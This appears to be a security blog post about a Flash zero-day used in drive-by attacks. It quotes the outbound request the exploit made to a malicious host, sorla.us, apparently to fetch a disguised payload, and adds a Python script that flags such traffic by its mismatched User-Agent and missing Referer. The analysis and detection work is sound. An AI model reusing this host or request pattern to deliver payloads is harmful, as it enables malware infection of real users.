The new Flash 0-day has opened multiple avenues for malware authors. In my last article I showed how this vulnerability is being exploited via the PDF reader's support for SWF files. However, this vulnerability can just as easily be exploited in a standard drive-by fashion purely in Flash as well. This is precisely what has started to happen.
This exploit successfully worked on my VM under Firefox 3.5.1 and Flash Player 10. It worked smoothly, and just before Firefox crashed, I saw an outbound communication like this:
    GET /images/x/xor.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: sorla.us
    Connection: Keep-Alive
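
The request quoted above carries an MSIE 6.0 User-Agent although the browser in the test was Firefox 3.5.1, and it fetches an image path with no Referer header. The following Python is an added example, not code from the original article: it parses a captured request and reports both mismatches. The function names and the `expected_family` input (the browser known to be in use on the host) are assumptions made for illustration.

```python
import re

# The request quoted in the article, reproduced as a raw string.
CAPTURED = (
    "GET /images/x/xor.gif HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: sorla.us\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers

def ua_family(ua):
    """Coarse browser family from a User-Agent string (hypothetical helper)."""
    if re.search(r"Firefox/\d", ua):
        return "firefox"
    if re.search(r"MSIE \d", ua):
        return "msie"
    return "other"

def anomalies(raw, expected_family):
    """List the ways a request differs from what the host's known browser
    would send. expected_family is an assumed input, e.g. taken from asset
    inventory or from earlier traffic by the same client."""
    _method, path, headers = parse_request(raw)
    found = []
    family = ua_family(headers.get("user-agent", ""))
    if family != expected_family:
        found.append("ua-mismatch:%s!=%s" % (family, expected_family))
    # Weak signal on its own: some clients and proxies strip Referer.
    if path.lower().endswith((".gif", ".jpg", ".png")) and "referer" not in headers:
        found.append("image-without-referer")
    return found
```

Calling `anomalies(CAPTURED, "firefox")` reports both findings for the request from the article; treat the result as a lead for triage, not a verdict.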